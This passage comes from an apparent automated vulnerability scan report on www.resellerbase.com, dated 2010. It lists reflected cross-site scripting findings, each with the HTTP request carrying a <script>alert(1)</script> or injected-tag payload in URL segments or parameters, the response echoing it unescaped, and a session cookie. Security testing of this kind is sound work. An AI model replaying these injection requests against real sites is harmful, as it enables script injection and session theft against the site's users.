<p>The requested URL /communication10bd5<script>alert(1)</script>8357d8bad7a/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.741. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc3b7<script>alert(1)</script>6ff55061869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesfc3b7<script>alert(1)</script>6ff55061869/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesfc3b7<script>alert(1)</script>6ff55061869/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.742. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 546cb<script>alert(1)</script>c18a5fdac78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos546cb<script>alert(1)</script>c18a5fdac78/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos546cb<script>alert(1)</script>c18a5fdac78/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.743. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd9a2<script>alert(1)</script>07c4d74b189 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/imagescd9a2<script>alert(1)</script>07c4d74b189/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/imagescd9a2<script>alert(1)</script>07c4d74b189/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.744. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bebd7<script>alert(1)</script>eb571cc4770 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/ratingbebd7<script>alert(1)</script>eb571cc4770/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/ratingbebd7<script>alert(1)</script>eb571cc4770/5.gif was not found on this server.</p>
...[SNIP]...

2.745. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1dfa1<script>alert(1)</script>dc12b55ee17 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/5.gif1dfa1<script>alert(1)</script>dc12b55ee17 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/5.gif1dfa1<script>alert(1)</script>dc12b55ee17 was not found on this server.</p>
...[SNIP]...

2.746. http://www.resellerbase.com/communication/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ffdeb<script>alert(1)</script>5c5e66d3d3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/5.gif?ffdeb<script>alert(1)</script>5c5e66d3d3e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/5.gif?ffdeb<script>alert(1)</script>5c5e66d3d3e=1 was not found on this server.</p>
...[SNIP]...

2.747. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3bd42<script>alert(1)</script>3ca2abf7f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication3bd42<script>alert(1)</script>3ca2abf7f90/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication3bd42<script>alert(1)</script>3ca2abf7f90/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.748. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af938<script>alert(1)</script>1757c3492a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesaf938<script>alert(1)</script>1757c3492a1/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesaf938<script>alert(1)</script>1757c3492a1/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.749. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91b89<script>alert(1)</script>c421ec8ce3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos91b89<script>alert(1)</script>c421ec8ce3d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos91b89<script>alert(1)</script>c421ec8ce3d/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.750. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1c228<script>alert(1)</script>ecd81b87b39 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images1c228<script>alert(1)</script>ecd81b87b39/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images1c228<script>alert(1)</script>ecd81b87b39/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.751. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 85c7a<script>alert(1)</script>c9cb30e49f4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating85c7a<script>alert(1)</script>c9cb30e49f4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating85c7a<script>alert(1)</script>c9cb30e49f4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.752. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b0f8a<script>alert(1)</script>805f2bd2086 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/search.phpb0f8a<script>alert(1)</script>805f2bd2086?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.phpb0f8a<script>alert(1)</script>805f2bd2086?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.753. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 96a20<a>57b204dea2e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96a20<a>57b204dea2e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search96a20<a>57b204dea2e&opt=2 was not found on this server.</p>
...[SNIP]...

2.754. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f6f62<a>912b24cfcc0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...f6f62<a>912b24cfcc0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...f6f62<a>912b24cfcc0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.755. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1484b<script>alert(1)</script>7ac05c122e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1484b<script>alert(1)</script>7ac05c122e0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&1484b<script>alert(1)</script>7ac05c122e0=1 was not found on this server.</p>
...[SNIP]...

2.756. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1cdf7<a>ad5aa613afc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=21cdf7<a>ad5aa613afc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=21cdf7<a>ad5aa613afc was not found on this server.</p>
...[SNIP]...

2.757. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f2ce<script>alert(1)</script>ac261366fc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication9f2ce<script>alert(1)</script>ac261366fc4/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication9f2ce<script>alert(1)</script>ac261366fc4/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.758. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2836<script>alert(1)</script>8d93a32f2f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf2836<script>alert(1)</script>8d93a32f2f7/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf2836<script>alert(1)</script>8d93a32f2f7/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.759. http://www.resellerbase.com/communication/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68a9a<script>alert(1)</script>4ea16b489b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

